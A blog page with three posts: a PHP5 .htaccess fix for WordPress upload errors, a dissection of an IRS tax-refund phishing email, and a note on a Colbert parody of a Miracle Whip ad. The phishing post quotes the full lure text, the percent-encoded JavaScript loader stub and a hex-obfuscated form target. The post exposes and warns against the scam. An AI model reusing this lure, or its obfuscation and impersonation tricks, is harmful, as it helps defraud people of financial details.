WordPress 500 Server Errors solved with PHP 5

Was having trouble with 500 Internal Server Errors when uploading files larger than ~1MB and an inability to automatically upgrade WordPress.  Did a lot of hunting around and none of the conventional solutions (increase limits in php.ini file, etc) seemed to apply.  On a whim, I upgraded my hosting package to PHP5 and things magically started working.  If you’re having this issue, hopefully this will work for you, too.

Also, for PHP5, my host (1and1) just requires that all php files end in .php5.  Easy to accomplish in your .htaccess file, just add:

AddType x-mapp-php5 .php
AddHandler x-mapp-php5 .php

Best of luck!

Inside the Spam Folder: A Letter from the “IRS”

Every once in a while, a spin around the old spam folder can be interesting just to see what trickery the spammers are up to lately.  You never know what the Nigerian Prince has up his sleeve.  In a recent foray, I found an entertaining e-mail from the “IRS”.  I knew it was a going to be first-rate when I saw the exclamation point in the subject line:

From: Internal Revenue Service [mailto:suvery123@irs.org]
Sent: Monday, October 26, 2009 10:56 AM
Subject: United States Department of the Treasury !

Internal Revenue Service (IRS)
United States Department of the Treasury

Dear Taxpayer,

After the last annual calculations of your fiscal activity we have determined that you are eligible to receive a tax refund of $773.80. Please submit the tax refund request and allow us 6-9 days in order to process it.

A refund can be delayed for a variety of reasons. For example submitting invalid records or applying after the deadline. To access your tax refund, use the form attached to this email.

Regards,
Internal Revenue Service

First, I have to congratulate the “IRS” for figuring out my e-mail address and connecting it with my tax records. Then there’s the fact that my check will be here within 9 days,  that’s fast!  Unless, of course, it’s delayed and I never hear from them again.  Hopefully my bank account doesn’t slowly empty while I wait.

Once you get beyond the questionable e-mail, though, things actually get a little scary.  Attached to the e-mail was an .html file that I was supposed to fill out.  Curious how it worked (but not wanting to open the page in a browser), I opened up the source in my favorite text editor.  The entire page code was eerily simple:

<Script Language='Javascript'>
<!-- HTML Encryption provided by Internal Revenue Service -->
<!--
document.write(unescape('[50 KB of percent encoded numbers]'));
//-->
</Script>'

The actual content the page writes to the DOM is Percent-encoded (like is used in URLs), making it hard to see what’s going on without rendering it in a browser.  Using a nifty decoding tool, I unpacked the HTML.  All of the CSS and image resources were linked directly off of the IRS.gov website, making the source and the page look awfully authentic.  The only sign of another party being involved was in the site the form was set to submit to.  Again, the spammer used some encoding to mask their identity.  The form went to http://0x3F.0xDCC619/, which resolves to https://63.220.198.25/.  Very crafty people who are definitely not planning to send me a tax refund anytime soon.

Turns out that the IP is owned by Beyond The Network America, a shady spam organization.  A quick web search shows their involvement in vanilla spam, phishing attacks, like the one I got, and various other types of Internet chicanery.  BTNA has even has the dubious distinction of been being banned from Wikipedia since March of 2007 (#87!).  But their spam machine rolls on.

So that was my latest foray into the Spam folder.  I found out that my spam was linked to a large spam-sending organization, and that said organization is pretty good at making their fake pages appear authentic.  Despite their efforts, though, there were quite a few warning signs that something was amiss, starting with the e-mail itself and ending with the form they wanted me to fill out.  A friendly reminder to anyone out there who may be tempted by $800: even if the IRS were looking to contact you about a surprise refund (as if), they would not be e-mailing to ask for your ATM card’s PIN number.  Every time someone does ask for that, you can just forward them on their merry way to the FTC’s CAN-SPAM people.

Fake IRS

Click the image to see a full-size version of the fake page styled with real IRS resources.

“The Mayolution will Not be Televised” – Colbert responds on behalf of mayonnaise everywhere

Late last week the Colbert Report showed a pitch-perfect parody of Miracle Whip’s new campaign.  Though Colbert lightheartedly attacks the campaign, the brand comes out ahead.  Miracle Whip was thrilled about their “special appearance” the next morning on Facebook.

And rightfully so.  The campaign didn’t just warrant a mention, but Colbert included a full thirty-second spot in the program.  Nobody’s ever watched a Miracle Whip commercial so intently.  Not to mention that appearing on Colbert grants the Colbert bump, just the kind of credibility Miracle Whip was looking for in the target (which Colbert identifies as 18-34 year old males in his spoof).  Nearly a perfect placement.  The only thing left to wonder is if Kraft paid for that kind of exposure…

Either way, it’s funny television.  Enjoy: